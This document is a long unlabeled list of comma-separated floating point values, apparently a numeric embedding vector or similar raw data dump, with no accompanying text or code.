-0.007747241295874119, 0.03149285167455673, -0.004015338607132435, -0.0009103402262553573, -0.005798621103167534, -0.03353988751769066, 0.0035153895150870085, -0.018029656261205673, 0.0021631652489304543, -0.012486915104091167, 0.02845379151403904, -0.003907081671059132, 0.005093968473374844, -0.018029656261205673, -0.0015126409707590938, -0.013447447679936886, 0.01569131389260292, 0.031240908429026604, 0.01571493223309517, -0.0008906571893021464, -0.017525771632790565, -0.007692128885537386, 0.02536749094724655, -0.016006240621209145, 0.013573418371379375, -0.016722703352570534, 0.0024308543652296066, -0.009951740503311157, -0.045853592455387115, -0.021919025108218193, -0.03763395547866821, 0.03410675749182701, -0.0013797805877402425, 0.002505650045350194, 0.011109103448688984, -0.020801028236746788, -0.00149000552482903, -0.018234360963106155, 0.007266975473612547, -0.015612580813467503, 0.02667444385588169, 0.026123320683836937, -0.016234565526247025, -0.007455932442098856, -0.0003503579646348953, 0.0026237480342388153, -0.03116217628121376, 0.0230055283755064, -0.026753176003694534, -0.008581802248954773, -0.025288758799433708, 0.0013994635082781315, -0.00040547046228311956, -0.006593815516680479, 0.0082590002566576, 0.024816365912556648, 0.0206593107432127, 0.001523466664366424, -0.028768720105290413, 0.003912986721843481, 0.02574540488421917, 0.030737021937966347, -0.012211352586746216, 0.0031079507898539305, -0.018328839913010597, -0.02632802352309227, 0.017761968076229095, 0.014841006137430668, -0.0025942237116396427, 0.0009811990894377232, 0.03574438765645027, 0.022737838327884674, -0.015321272425353527, 0.00844795722514391, -0.014282007701694965, -0.005090032238513231, -0.017761968076229095, 0.013809614814817905, -0.018974442034959793, 0.0034602771047502756, -0.009975360706448555, 0.020265650004148483, 0.003052838146686554, 0.001628770842216909, 0.04572761803865433, -0.01582515798509121, -0.006066310219466686, -0.001491973758675158, 0.0026473677717149258, -0.012644379399716854, -0.004070451017469168, 0.005401024129241705, -0.00616472540423274, 0.006341872736811638, 0.03694111481308937, -0.029099393635988235, 0.005676586180925369, 0.010030472651124, -0.004554653540253639, 0.014486711472272873, -0.029115140438079834, -0.003655139124020934, 0.008802251890301704, 0.027571991086006165, -0.023446427658200264, 0.033476900309324265, 0.017557265236973763, -0.0058852266520261765, -0.01676994375884533, 0.016439268365502357, 0.011337426491081715, -0.004771166946738958, 0.02610757388174534, -0.04475134238600731, 0.0019515726016834378, -0.009896628558635712, -0.008125155232846737, -0.029256857931613922, 0.03650021553039551, -0.015557467937469482, 0.017903685569763184, 0.011589368805289268, -0.006133232731372118, 0.0007159702945500612, 0.02739877998828888, -0.0004256455576978624, -0.004586146213114262, 0.006141106132417917, -0.005747445393353701, 0.016565239056944847, -0.018706753849983215, -0.0017567105824127793, 0.009369122795760632, 0.04169653356075287, -0.01628180406987667, 0.01711636409163475, 0.006574132479727268, -0.01591963693499565, 0.007936198264360428, -0.006333999801427126, 0.024721888825297356, -0.013061660341918468, 0.004286964423954487, -0.012132620438933372, 0.03942904993891716, 0.006601688917726278, -0.017195096239447594, -0.028768720105290413, -0.011014624498784542, -0.006231647916138172, -0.026595711708068848, -0.020926998928189278, -0.003722061403095722, 0.013266363181173801, 0.012770351022481918, 0.006952046882361174, 0.041853997856378555, -0.006282823625952005, 0.016470761969685555, 0.01913190633058548, -0.0032063659746199846, -0.022107981145381927, 0.0025528892874717712, -0.010998878628015518, 0.0009246104164049029, 0.02253313548862934, 0.014022191986441612, 0.00342287914827466, -0.010298162698745728, 0.04188549146056175, -0.0004465587844606489, -0.0015884207095950842, -0.03810634836554527, 0.00985726248472929, -0.004200358875095844, -0.01889570988714695, -0.008597548119723797, 0.022737838327884674, 0.02075378969311714, 0.008196014910936356, 0.00593640236184001, -0.03533497825264931, -0.02772945538163185, -0.013998571783304214, -0.015140187926590443, -0.0265642199665308, 0.014045811258256435, -0.01299080066382885, -0.012124747969210148, 0.0057198889553546906, -0.01280184369534254, -0.009786403737962246, -0.03646872192621231, -0.02229693904519081, -0.0003673345781862736, 0.006393048912286758, 0.0067001041024923325, -0.02563518099486828, -0.0019722396973520517, 0.006778836250305176, 0.02149387076497078, -0.015274032950401306, -0.017793461680412292, -0.027792440727353096, -0.004956187214702368, 0.0022635485511273146, -0.002893405733630061, -0.003627582686021924, -0.02739877998828888, -0.0159432552754879, 0.023462174460291862, 0.04141309857368469, 0.015840904787182808, 0.01256564725190401, 0.012203480117022991, 0.0378229133784771, -0.007200052961707115, -0.015573214739561081, -0.040909212082624435, -0.006448161322623491, 0.01305378694087267, -0.025808392092585564, 0.0031788095366209745, -0.022926796227693558, 0.011746833100914955, -0.028737226501107216, 0.012912068516016006, -0.02749325893819332, 0.027713708579540253, 0.012982928194105625, -0.014305627904832363, 0.0038185082376003265, -0.0013669865438714623, -0.021194688975811005, 0.02218671329319477, 0.0018246170366182923, -0.0006874299142509699, -0.006046627182513475, 0.0026729556266218424, 0.022737838327884674, -0.009243152104318142, 0.0123924370855093, 0.013707263395190239, -0.012605013325810432, -0.0265642199665308, 0.004235788248479366, 0.026044588536024094, 0.02665869891643524, -0.016486506909132004, 0.00892035011202097, 0.007373263593763113, 0.025997348129749298, 0.0003710251476150006, -0.014683541841804981, -0.002578477142378688, -0.03609080612659454, 0.007274848408997059, -0.001914174878038466, -0.03117792308330536, -0.000805528077762574, 0.021919025108218193, -0.016943152993917465, 0.006601688917726278, -0.02727280929684639, -0.0009280549711547792, 0.01639202982187271, 0.01628180406987667, -0.01851779595017433, 0.0036886001471430063, -0.019809003919363022, 0.02516278810799122, -0.007286658510565758, 0.013998571783304214, 0.0009452776284888387, 0.006542639806866646, -0.014864625409245491, -0.00025366508634760976, -0.01097525842487812, 0.038326799869537354, -0.035712894052267075, 0.011353172361850739, 0.006180472206324339, -0.04153906926512718, 0.004176739137619734, -0.008833744563162327, -0.011329553090035915, 0.0074323127046227455, 0.043365657329559326, -0.011888551525771618, -0.0061096129938960075, -0.0436490923166275, -0.0004861708730459213, 0.04437342658638954, -0.019194893538951874, -0.011124849319458008, 0.017887938767671585, 0.006479653995484114, -0.005967895034700632, -0.026879148557782173, 0.009180165827274323, -0.014282007701694965, 0.0005998404230922461, -0.0448773130774498, -0.03401228040456772, -0.035492442548274994, -0.04878242686390877, 0.0023599956184625626, 0.025902869179844856, 0.015022089704871178, 0.009188039228320122, -0.011518510058522224, -0.008715646341443062, -0.0022950414568185806, -0.018974442034959793, 0.010613090358674526, 0.010872907005250454, 0.0016297550173476338, 0.006341872736811638, -0.015132314525544643, -0.008172394707798958, -0.014778019860386848, 0.02040736749768257, 0.0283278189599514, 0.006026944145560265, 0.02772945538163185, -0.010117078199982643, -0.010762682184576988, -0.009888755157589912, -0.008148775435984135, 0.004432618618011475, 0.019982213154435158, -0.02985522337257862, -0.0076330797746777534, 0.017336813732981682, -0.0005097905523143709, 0.01375450287014246, -0.01173896063119173, 0.022643359377980232, -0.013825361616909504, 0.0016405807109549642, -0.01369938999414444, 0.0038165398873388767, -0.02338344231247902, -0.025115547701716423, 0.029807982966303825, 0.02385583519935608, 0.003474055090919137, -0.014274134300649166, -0.0010225335136055946, -0.007200052961707115, 0.00984938908368349, 0.009715544059872627, -0.01256564725190401, 0.0011199645232409239, -0.02938283048570156, 0.05092393979430199, -0.007203989662230015, 0.05186872556805611, -0.011046117171645164, 0.0007061287760734558, 0.0047239274717867374, -0.02184029296040535, -0.019320864230394363, 0.011935790069401264, 0.0015628327382728457, -0.016691211611032486, -0.00596395879983902, 0.0044444287195801735, -0.018974442034959793, -0.02609182707965374, -0.02196626365184784, -0.0242022555321455, 0.03344540670514107, 0.014943357557058334, 0.01275460422039032, 0.005900972988456488, 0.011203581467270851, 0.004227915313094854, -0.019210638478398323, 0.0021631652489304543, -0.015856649726629257, 0.01889570988714695, 0.00933763012290001, -0.03451616317033768, -0.016565239056944847, -0.0037161563523113728, -0.029335590079426765, -0.01162873487919569, 0.0182973463088274, -0.012691618874669075, 0.004385379608720541, -0.02182454615831375, -0.003011503955349326, 0.019541313871741295, -0.004184612538665533, -0.020391620695590973, -0.02516278810799122, -0.033224958926439285, -0.0013010484399273992, -0.008321985602378845, -0.032878536731004715, -0.0010756776900961995, 0.0779133141040802, 0.0005806494154967368, 0.014919738285243511, -0.01440797932446003, 0.013967079110443592, -0.0019879862666130066, 0.016092846170067787, 0.000534886377863586, -0.0025154915638267994, 0.007451995741575956, 0.008298366330564022, 0.0037240295205265284, 0.0009674209868535399, -0.007121320813894272, 0.022044995799660683, 0.004538907203823328, -0.018580781295895576, -0.006684357766062021, 0.030406348407268524, -0.002818610053509474, 0.008093662559986115, 0.03495706617832184, 0.009581699967384338, -0.004389316309243441, 0.0002341050567338243, -0.015549595467746258, -0.03328794240951538, -0.017683235928416252, -0.028831705451011658, -0.001524450839497149, -0.012234972789883614, -0.020281396806240082, 0.018124135211110115, -0.030768515542149544, 0.003121728776022792, 0.013809614814817905, -0.005460073240101337, -0.02350941300392151, -0.01807689666748047, -0.01973027177155018, -0.00019879861793015152, 0.015392131172120571, 0.017683235928416252, 0.0013817488215863705, 0.0019092541188001633, -0.014966977760195732, 0.011471270583570004, 0.02705235965549946, -0.0044877310283482075, -0.010715442709624767, 0.008794378489255905, -0.039838455617427826, 0.010778428055346012, 0.0008591643418185413, 0.010203683748841286, 0.02665869891643524, -0.004755420610308647, -0.03319346532225609, -0.0029091520700603724, -0.011857057921588421, -0.008896730840206146, -0.00010739554272731766, -0.023540906608104706, 0.010392640717327595, -0.006727660074830055, 0.014541824348270893, -0.00844008382409811, -0.005440390203148127, -0.010943765752017498, 0.007881086319684982, 0.008188141509890556, 0.007180369924753904, 0.008644787594676018, 0.00796375423669815, 0.017431292682886124, -0.0037023783661425114, 0.017415545880794525, 0.0011967283207923174, -0.007239419035613537, -0.02725706249475479, 0.006763089913874865, 0.0017852509627118707, -0.01947832852602005, 0.01911616139113903, -0.02089550718665123, 0.021651335060596466, -0.018848471343517303, -0.0057671284303069115, 0.006416668184101582, 0.005113651510328054, 0.0018059181747958064, 0.013636404648423195, 0.011353172361850739, -0.0036708854604512453, 0.01346319355070591, 0.024769127368927002, 0.013447447679936886, 0.017541518434882164, -0.021068716421723366, -0.03141411766409874, 0.005747445393353701, -0.006042690947651863, -0.00120164908003062, 0.007940134964883327, -0.008534562774002552, 0.025902869179844856, 0.01853354275226593, 0.011534256860613823, 0.007904705591499805, -0.016864420846104622, -0.037602465599775314, -0.015557467937469482, 0.006050563883036375, -0.007743304595351219, -0.02149387076497078, 0.01678568869829178, -0.00596002209931612, 0.0016848675440996885, -0.015770044177770615, -0.022107981145381927, -0.028595509007573128, -0.012620760127902031, 0.018502049148082733, -0.026737431064248085, 0.0061096129938960075, 0.01946258172392845, 0.0283278189599514, -0.007400820031762123, 0.044215962290763855, 0.021997757256031036, 0.012132620438933372, -0.003418942680582404, -0.0041806758381426334, 0.01210112776607275, -0.011305933818221092, -0.004436555318534374, 0.005314418580383062, -0.013014420866966248, 0.005231749732047319, -0.0005954116932116449, -0.03735052049160004, 0.028485283255577087, 0.03439019247889519, -0.009227405302226543, -0.010069838725030422, -0.006826075259596109, -0.0013482876820489764, 0.012510535307228565, 0.024942338466644287, 0.01168384775519371, -0.024879353120923042, -0.019399596378207207, -0.0028225467540323734, 0.013415954075753689, -0.0342327281832695, -0.02763497643172741, 0.011258694343268871, 0.00020753296848852187, -0.00004659342812374234, -0.003997623920440674, 0.027068104594945908, 0.01640777476131916, 0.005475819576531649, -0.02374560944736004, 0.015069329179823399, 0.014179656282067299, 0.01958855241537094, -0.029130887240171432, -0.011368919163942337, -0.028406551107764244, 0.009495094418525696, 0.0027871173806488514, -0.008455830626189709, 0.036626186221838, 0.030516572296619415, 0.045885082334280014, -0.012652252800762653, 0.029540294781327248, 0.023792847990989685, -0.004743610508739948, 0.009715544059872627, 0.008180268108844757, -0.013904093764722347, -0.002367868786677718, 0.006440287921577692, -0.034295715391635895, 0.000838005100376904, 0.006085993256419897, -0.05775788798928261, -0.00010536573245190084, -0.004058641381561756, 0.004322393797338009, -0.0008955779485404491, -0.012148367241024971, -0.01026666909456253, 0.01145552471280098, -0.007337834220379591, -0.01675419695675373, -0.0036393925547599792, 0.007479552179574966, 0.007755114696919918, -0.01205388829112053, 0.0008015914936549962, -0.008841617964208126, -0.005948211997747421, -0.04298774152994156, -0.02409203164279461, -0.006011197809129953, 0.01818712055683136, -0.00807791668921709, 0.0007691144710406661, 0.01807689666748047, 0.01069182250648737, -0.01080204825848341, -0.005416770465672016, 0.016313297674059868, -0.02846953645348549, -0.012935688719153404, 0.012046015821397305, -0.022974034771323204, -0.006133232731372118, -0.0010599312372505665, -0.0016819150187075138, -0.0242180023342371, 0.0247848741710186, 0.018864218145608902, 0.016565239056944847, -0.019651539623737335, 0.019997959956526756, 0.028957676142454147, -0.028894690796732903, -0.02527301199734211, -0.011337426491081715, -0.006999285891652107, 0.008573928847908974, 0.021037224680185318, 0.005164827685803175, 0.00410194369032979, -0.004979806952178478, 0.010124951601028442, 0.009904501959681511, -0.0159590020775795, -0.016376283019781113, 0.002421012846753001, -0.00011809819261543453, -0.00035183419822715223, 0.0057513820938766, -0.020060945302248, -0.004235788248479366, 0.02939857542514801, 0.012904196046292782, 0.019620046019554138, -0.014974850229918957, -0.012077508494257927, -0.00986513588577509, 0.019273625686764717, -0.027005119249224663, 0.012439676560461521, 0.028516776859760284, -0.01876973919570446, -0.0064993370324373245, -0.009290390647947788, 0.009676177985966206, -0.0008798314956948161, -0.021210435777902603, 0.010707569308578968, 0.004944377578794956, 0.0377914197742939, 0.02870573289692402, -0.015864523127675056, -0.013345095328986645, 0.014313500374555588, 0.009904501959681511, 0.005712016019970179, -0.007400820031762123, -0.01796667091548443, 0.003222112311050296, -0.0010520580690354109, 0.0023285027127712965, 0.010613090358674526, -0.012502661906182766, -0.005861606914550066, 0.021178942173719406, -0.0342642217874527, 0.014100924134254456, -0.0007351612439379096, -0.0248006209731102, -0.0012725080596283078, -0.005196320358663797, 0.007857466116547585, -0.018502049148082733, 0.030154405161738396, -0.011550002731382847, -0.007747241295874119, -0.011912170797586441, 0.016250310465693474, -0.010770554654300213, 0.013998571783304214, 0.013195504434406757, -0.014809513464570045, 0.028060130774974823, 0.015266159549355507, -0.011935790069401264, 0.011290187016129494, -0.009062067605555058, -0.015856649726629257, -0.0003203413507435471, -0.027587737888097763, 0.011699594557285309, 0.0058852266520261765, 0.025934362784028053, -0.020801028236746788, -0.019509820267558098, -0.012368816882371902, -0.014864625409245491, -0.006987476255744696, 0.007369326893240213, -0.008880984038114548, -0.025099802762269974, 0.012620760127902031, -0.019982213154435158, 0.0038893669843673706, -0.02075378969311714, -0.021903278306126595, -0.011675974354147911, 0.008873110637068748, 0.002997725736349821, -0.0005147113115526736, -0.008833744563162327, -0.03741350769996643, 0.0037712689954787493, 0.019683031365275383, 0.017289575189352036, 0.00640485854819417, 0.00389527203515172, -0.009951740503311157, 0.011990902945399284, -0.016580985859036446, -0.03141411766409874, -0.006019071210175753, -0.04793211817741394, -0.0010077712358906865, 0.005507312249392271, 0.013211251236498356, 0.007802353706210852, -0.0071961162611842155, 0.019746016710996628, 0.03319346532225609, -0.006605625618249178, -0.04673539102077484, 0.003332337364554405, -0.008003120310604572, 0.01580941118299961, 0.015376384370028973, 0.0037358393892645836, -0.0016710894415155053, -0.000966436869930476, 0.021745814010500908, 0.009691924788057804, -0.003812603186815977, -0.018029656261205673, 0.01008558552712202, -0.0020864014513790607, -0.003863779129460454, 0.03259510174393654, -0.011644481681287289, 0.022155221551656723, 0.010526485741138458, -0.012738858349621296, -0.0011485049035400152, -0.026170559227466583, 0.009471475146710873, 0.020092438906431198, -0.0027339730877429247, -0.0050231097266077995, 0.014510330744087696, 0.01603773422539234, -0.010526485741138458, -0.013817488215863705, 0.031918004155159, 0.0011829502182081342, -0.016612479463219643, 0.0006062373868189752, 0.0009723417460918427, 0.007479552179574966, 0.04260982573032379, -0.007644889410585165, -0.02018691785633564, -0.00640879524871707, 0.02574540488421917, 0.017399800941348076, 0.002928835107013583, 0.00528292590752244, 0.020344382151961327, -0.004235788248479366, 0.017793461680412292, 0.015470863319933414, -0.01840757206082344, -0.017289575189352036, -0.0006524925120174885, 0.02820184826850891, -0.017037631943821907, -0.006341872736811638, 0.005062475800514221, 0.028768720105290413, -0.01949407532811165, -0.005534868687391281, -0.020123932510614395, 0.018344584852457047, -0.012250718660652637, 0.02256462723016739, 0.010117078199982643, -0.012486915104091167, -0.012305831536650658, -0.03650021553039551, -0.017777714878320694, -0.010132825002074242, 0.007227609399706125, -0.012494788505136967, -0.00457827327772975, 0.006578069180250168, 0.012030269019305706, -0.019903481006622314, 0.000517171632964164, 0.0012616823660209775, -0.023997552692890167, 0.009038448333740234, -0.004086197353899479, -0.02385583519935608, 0.017793461680412292, 0.00956595316529274, 0.0017202970338985324, 0.024532930925488472, -0.00047657539835199714, 0.028973422944545746, 0.023414934054017067, -0.027351541444659233, -0.007912578992545605, -0.012431803159415722, 0.015266159549355507, 0.005790748167783022, -0.0036531707737594843, -0.014100924134254456, 0.000922642124351114, -0.0070425886660814285, -0.014069431461393833, -0.009125053882598877, -0.012715238146483898, -0.013022294268012047, -0.02196626365184784, -0.0022044996730983257, 0.00504279276356101, 0.006519020069390535, 0.01032965537160635, -0.017510024830698967, 0.0033047811593860388, 0.00457039987668395, 0.014722907915711403, 0.007026842329651117, -0.0018728404538705945, 0.006570196244865656, -0.013431700877845287, 0.02017117105424404, 0.006814265623688698, 0.01346319355070591, 0.032532114535570145, 0.022974034771323204, 0.0008276714943349361, 0.013856854289770126, 0.0159353818744421, 0.005881289951503277, 0.0005762207438237965, 0.00025760167045518756, -0.031477104872465134, 0.025210026651620865, -0.016486506909132004, -0.01796667091548443, -0.008337732404470444, 0.004038958344608545, -0.013305729255080223, -0.005999388173222542, 0.014250515028834343, -0.007404756732285023, -0.0007302404846996069, -0.007900768890976906, 0.02017117105424404, -0.01804540306329727, -0.0017754094442352653, 0.005034919362515211, 0.006896934472024441, 0.013612784445285797, -0.0029209619387984276, -0.0076330797746777534, 0.03172904625535011, 0.008699900470674038, -0.005062475800514221, -0.00015709520084783435, -0.006326126400381327, 0.0123924370855093, -0.0165337473154068, -0.012691618874669075, 0.00010942535300273448, 0.018974442034959793, 0.020108185708522797, -0.013959206640720367, 0.007570093963295221, 0.004255471285432577, 0.03103620372712612, 0.02302127331495285, 0.008243253454566002, 0.00436569657176733, 0.0003432228695601225, -0.029666265472769737, -0.000026080017050844617, 0.014982723630964756, 0.003168968018144369, -0.014959104359149933, -0.006955983582884073, 0.011983029544353485, 0.0091407997533679, 0.020108185708522797, 0.01511656865477562, -0.010313908569514751, -0.01758875697851181, 0.0021907214540988207, 0.009487221017479897, 0.0049050115048885345, 0.006459970958530903, 0.007223672699183226, -0.010817794129252434, -0.010219430550932884, 0.00481446972116828, 0.002269453601911664, -0.02209223434329033, 0.00480659632012248, -0.012982928194105625, 0.0025843821931630373, 0.001541181351058185, 0.02091125212609768, 0.0035271993838250637, 0.00007024381920928136, -0.019541313871741295, 0.023666877299547195, 0.004204295575618744, 0.0057671284303069115, 0.001642549061216414, -0.009164419956505299, -0.014006445184350014, -0.018801232799887657, -0.010211557149887085, -0.01628180406987667, -0.007676382549107075, 0.008652660995721817, 0.005814367439597845, -0.016738450154662132, 0.006522956769913435, 0.00620015524327755, 0.002491871826350689, 0.0003867715713568032, -0.004440492019057274, 0.008400717750191689, 0.01037689484655857, 0.007696065586060286, -0.0006633181474171579, -0.006507210433483124, 0.01374662946909666, 0.00784565694630146, 0.007156750187277794, -0.0005521090351976454, -0.007156750187277794, -0.000034076248994097114, 0.025918615981936455, -0.008196014910936356, 0.0014476870419457555, -0.0025017133448272943, 0.008573928847908974, 0.004708181135356426, -0.005818304140120745, 0.020690802484750748, 0.0024958085268735886, 0.026847654953598976, -0.009432109072804451, 0.000719906878657639, -0.0027674343436956406, -0.0365946926176548, 0.008046423085033894, 0.006444224622100592, -0.01305378694087267, -0.01558108814060688, -0.007266975473612547, 0.024233749136328697, 0.01771472953259945, -0.016266057267785072, -0.005428580101579428, -0.0007892895955592394, -0.0019456676673144102, -0.0044089993461966515, -0.003641360905021429, 0.006389112211763859, 0.016250310465693474, -0.009227405302226543, -0.004802659619599581, -0.01210112776607275, -0.0007917499751783907, -0.012825463898479939, 0.006235584616661072, 0.028264833614230156, -0.008951842784881592, -0.008384971879422665, -0.004412935581058264, -0.022470148280262947, 0.0030882677529007196, -0.0017262018518522382, 0.008597548119723797, 0.01569131389260292, -0.007436249405145645, 0.016848675906658173, -0.016911661252379417, -0.015990495681762695, -0.015069329179823399, 0.019399596378207207, 0.004983743652701378, -0.0019112223526462913, -0.02372986264526844, 0.02029714174568653, 0.016943152993917465, 0.028611255809664726, -0.020234156399965286, 0.002576508792117238, -0.005302608944475651, 0.019320864230394363, -0.009243152104318142, -0.01440010592341423, 0.00910143367946148, -0.017746221274137497, 0.027524752542376518, -0.02043886110186577, -0.01925787888467312, -0.0159511286765337, -0.013486813753843307, -0.021698573604226112, -0.01724233664572239, -0.015274032950401306, -0.011959410272538662, -0.01126656774431467, 0.012691618874669075, 0.020013706758618355, -0.0038303181063383818, 0.0037378077395260334, 0.010432006791234016, 0.027524752542376518, 0.01234519761055708, -0.00732208788394928, -0.008133028633892536, 0.014951230958104134, 0.002794990548864007, 0.0036157730501145124, -0.03675215691328049, 0.005578170996159315, 0.031225161626935005, 0.024249495938420296, 0.0035665654577314854, -0.010849286802113056, 0.0024328227154910564, -0.001150473253801465, 0.012486915104091167, -0.01935235597193241, 0.018391825258731842, 0.0023147244937717915, -0.0007046525133773685, -0.00910143367946148, 0.032532114535570145, 0.009054194204509258, -0.011250820942223072, -0.014203275553882122, -0.016943152993917465, 0.004231852013617754, -0.007770861033350229, -0.009833642281591892, -0.02799714356660843, -0.0023796786554157734, 0.007215799298137426, -0.007062271703034639, -0.008755012415349483, 0.003987782169133425, -0.01103824470192194, -0.008810125291347504, -0.01796667091548443, 0.01262863352894783, -0.00956595316529274, -0.006554449442774057, 0.012518408708274364, 0.00640879524871707, -0.004960123915225267, -0.008125155232846737, -0.056498173624277115, -0.018376078456640244, 0.010636710561811924, -0.0009428172488696873, -0.006959920283406973, 0.00569626921787858, -0.017620250582695007, 0.0006574132712557912, -0.003848032793030143, 0.02445419877767563, -0.007022905629128218, -0.010912273079156876, -0.02705235965549946, -0.002440695883706212, -0.003285098122432828, 0.017573010176420212, -0.000052006260375492275, 0.0036748219281435013, 0.009290390647947788, 0.009274644777178764, -0.015337018296122551, 0.003690568497404456, -0.013541925698518753, 0.015384257771074772, 0.007207926362752914, 0.0019387786742299795, 0.049191832542419434, -0.008463704027235508, -0.029682012274861336, -0.019383849576115608, -0.005641156807541847, -0.020108185708522797, -0.005826177541166544, -0.006743406876921654, 0.007920452393591404, 0.016344789415597916, 0.0271310918033123, 0.010731188580393791, -0.0033815449569374323, -0.00002551105535530951, -0.023635385558009148, 0.007680319249629974, -0.02442270517349243, -0.038326799869537354, -0.016612479463219643, 0.0401533842086792, -0.010148570872843266, 0.0031551900319755077, 0.0018836661474779248, -0.0004502493538893759, 0.037382014095783234, -0.0007036683964543045, 0.01446309220045805, 0.017620250582695007, 0.0006721755489706993, 0.014911864884197712, -0.00932975672185421, -0.012479042634367943, -0.0036374242044985294, 0.024060538038611412, 0.002794990548864007, 0.0006032849196344614, -0.01037689484655857, 0.0020391622092574835, 0.010920146480202675, 0.01911616139113903, 0.01689591445028782, -0.0017675362760201097, 0.008636914193630219, 0.016958899796009064, -0.004389316309243441, 0.003222112311050296, 0.0035449140705168247, -0.005625410471111536, -0.018848471343517303, -0.03612229973077774, -0.011652355082333088, 0.022848064079880714, 0.0026001285295933485, 0.015077202580869198, 0.00849519670009613, -0.010935892350971699, -0.020234156399965286, -0.005420707166194916, 0.01234519761055708, 0.0031197606585919857, -0.003098109271377325, -0.024737633764743805, 0.011321679688990116, 0.017683235928416252, -0.0006362540298141539, -0.03410675749182701, -0.010424133390188217, 0.030973218381404877, -0.01232945080846548, -0.008042486384510994, 0.005845860578119755, -0.010967385023832321, 0.0009339598473161459, -0.01604560762643814, 0.004645195323973894, -0.004534970503300428, 0.00850307010114193, 0.018502049148082733, -0.018942950293421745, 0.007715748623013496, -0.02963477186858654, -0.006975666619837284, -0.001103233895264566, 0.004566463176161051, 0.01144765131175518, 0.01332934945821762, 0.01008558552712202, 0.011707467027008533, -0.0035980581305921078, -0.0034799601417034864, 0.0036452976055443287, -0.01960429921746254, 0.001793124247342348, -0.02489509806036949, -0.009369122795760632, -0.018596528097987175, 0.007857466116547585, 0.01735256053507328, -0.0033047811593860388, 0.02716258354485035, 0.008014930412173271, 0.0032634467352181673, -0.000948722125031054, 0.00643241498619318, -0.010865033604204655, 0.010998878628015518, -0.007207926362752914, -0.0165180005133152, -0.021052971482276917, -0.014344993978738785, 0.009873008355498314, -0.01352617982774973, 0.0008109409245662391, -0.017321068793535233, -0.004247598350048065, -0.03486258536577225, -0.027902666479349136, -0.010132825002074242, 0.013896220363676548, -0.024832112714648247, -0.005507312249392271, -0.0050703492015600204, 0.00010671893687685952, -0.012305831536650658, 0.010494992136955261, 0.003594121662899852, -0.01876973919570446, -0.029319845139980316, -0.012297958135604858, 0.0018659514607861638, -0.006314316764473915, -0.01168384775519371, 0.007011095993220806, 0.006015134509652853, -0.008329859003424644, -0.01121145486831665, -0.011998776346445084, -0.007097701076418161, -0.003605931531637907, -0.010298162698745728, 0.004916821140795946, 0.0029347401577979326, -0.02135215327143669, -0.014541824348270893, -0.032059721648693085, -0.0069717299193143845, 0.011305933818221092, -0.012014522217214108, 0.02669019065797329, -0.016848675906658173, -0.01126656774431467, -0.007333897519856691, 0.011014624498784542, 0.004271218087524176, -0.018470557406544685, 0.01345532014966011, -0.025068309158086777, -0.02100573107600212, 0.008904603309929371, 0.021682828664779663, 0.0025863503105938435, -0.0030961409211158752, -0.021509617567062378, -0.0206750575453043, -0.011282313615083694, -0.009589573368430138, 0.0082668736577034, 0.01749427802860737, -0.01375450287014246, -0.005479756277054548, 0.004672751761972904, 0.013156138360500336, 0.008755012415349483, 0.024249495938420296, 0.01145552471280098, 0.001183934393338859, -0.0014299722388386726, -0.009030574932694435, -0.0020864014513790607, 0.008510942570865154, -0.0004556622006930411, 0.014470964670181274, 0.005456136539578438, 0.01570705883204937, 0.010077712126076221, 0.02669019065797329, 0.0008960700361058116, -0.004401125945150852, 0.005948211997747421, 0.012148367241024971, 0.011707467027008533, -0.006030880846083164, -0.001746869063936174, 0.023084260523319244, 0.011006751097738743, -0.027886919677257538, 0.0015667693223804235, -0.0182815995067358, 0.03092597983777523, 0.004286964423954487, 0.002050971845164895, 0.012636505998671055, 0.006837885361164808, -0.00004302587694837712, 0.011778326705098152, 0.015281906351447105, -0.008384971879422665, -0.004983743652701378, 0.006696167401969433, -0.0005565377068705857, 0.005570298060774803, 0.006471781060099602, 0.018565036356449127, -0.012793970294296741, -0.003121728776022792, 0.000805528077762574, -0.002271421952173114, -0.026942133903503418, 0.004660942126065493, -0.000503639574162662, -0.017447039484977722, 0.009188039228320122, 0.000377176096662879, -0.024029044434428215, -0.02845379151403904, -0.011077610775828362, 0.016100719571113586, 0.022344177588820457, -0.006467844359576702, 0.011109103448688984, 0.026721684262156487, -0.031461358070373535, 0.017809206619858742, -0.0012725080596283078, 0.0074323127046227455, -0.006125359330326319, -0.020722296088933945, 0.018816977739334106, -0.02596585638821125, 0.009715544059872627, -0.012707365676760674, 0.027241315692663193, -0.0036708854604512453, 0.009455728344619274, -0.009510841220617294, -0.022517388686537743, -0.02147812396287918, 0.003928733058273792, -0.018155628815293312, -0.01275460422039032, 0.00120361743029207, 0.004534970503300428, 0.003271319903433323, 0.014494584873318672, -0.007333897519856691, -0.021226180717349052, -0.00729453144595027, -0.020360128954052925, 0.007022905629128218, -0.012549901381134987, -0.0037122198846191168, -0.011518510058522224, -0.020060945302248, 0.015171680599451065, -0.008644787594676018, 0.001829537795856595, -0.01865951344370842, 0.0032791930716484785, 0.010605217888951302, 0.020092438906431198, -0.013148264959454536, -0.0034642135724425316, -0.014077303931117058, 0.0159432552754879, -0.007034715730696917, 0.03624827042222023, 0.010841414332389832, 0.018722500652074814, -0.004491667728871107, -0.010124951601028442, -0.006987476255744696, 0.0027516877744346857, -0.0013600975507870317, -0.009786403737962246, -0.01080204825848341, 0.004566463176161051, -0.0033284006640315056, 0.005440390203148127, -0.006704040803015232, 0.012360944412648678, 0.014762273989617825, -0.024816365912556648, -0.01678568869829178, 0.008329859003424644, -0.0006155868177302182, -0.023351948708295822, 0.005668713245540857, 0.017147857695817947, -0.0010013742139562964, -0.007066208403557539, -0.007455932442098856, -0.010676076635718346, -0.021289167925715446, -0.01352617982774973, -0.0007425423827953637, -0.002800895366817713, -0.00549156591296196, 0.011825565248727798, -0.007428376004099846, -0.0006923506734892726, 0.00012185026571387425, 0.0045625269412994385, 0.008644787594676018, 0.006282823625952005, -0.00986513588577509, -0.014148163609206676, 0.02665869891643524, 0.01996646821498871, 0.028894690796732903, 0.014628428965806961, -0.014557570219039917, -0.03116217628121376, 0.03388630598783493, 0.006778836250305176, 0.031823527067899704, -0.001914174878038466, -0.007188243325799704, 0.01303804013878107, 0.023399189114570618, -0.00009447854972677305, 0.0200766921043396, -0.017321068793535233, -0.02550920844078064, -0.000880815670825541, -0.008337732404470444, 0.002356058917939663, 0.0030095356050878763, 0.01192791759967804, 0.022407162934541702, -0.029792236164212227, -0.023777103051543236, -0.0005319339106790721, -0.0050585390999913216, 0.003300844458863139, 0.0132742365822196, -0.024769127368927002, 0.0040625776164233685, -0.02291104942560196, 0.01398282591253519, 0.003696473315358162, 0.008148775435984135, -0.005322291981428862, -0.005180574022233486, 0.0009551191469654441, 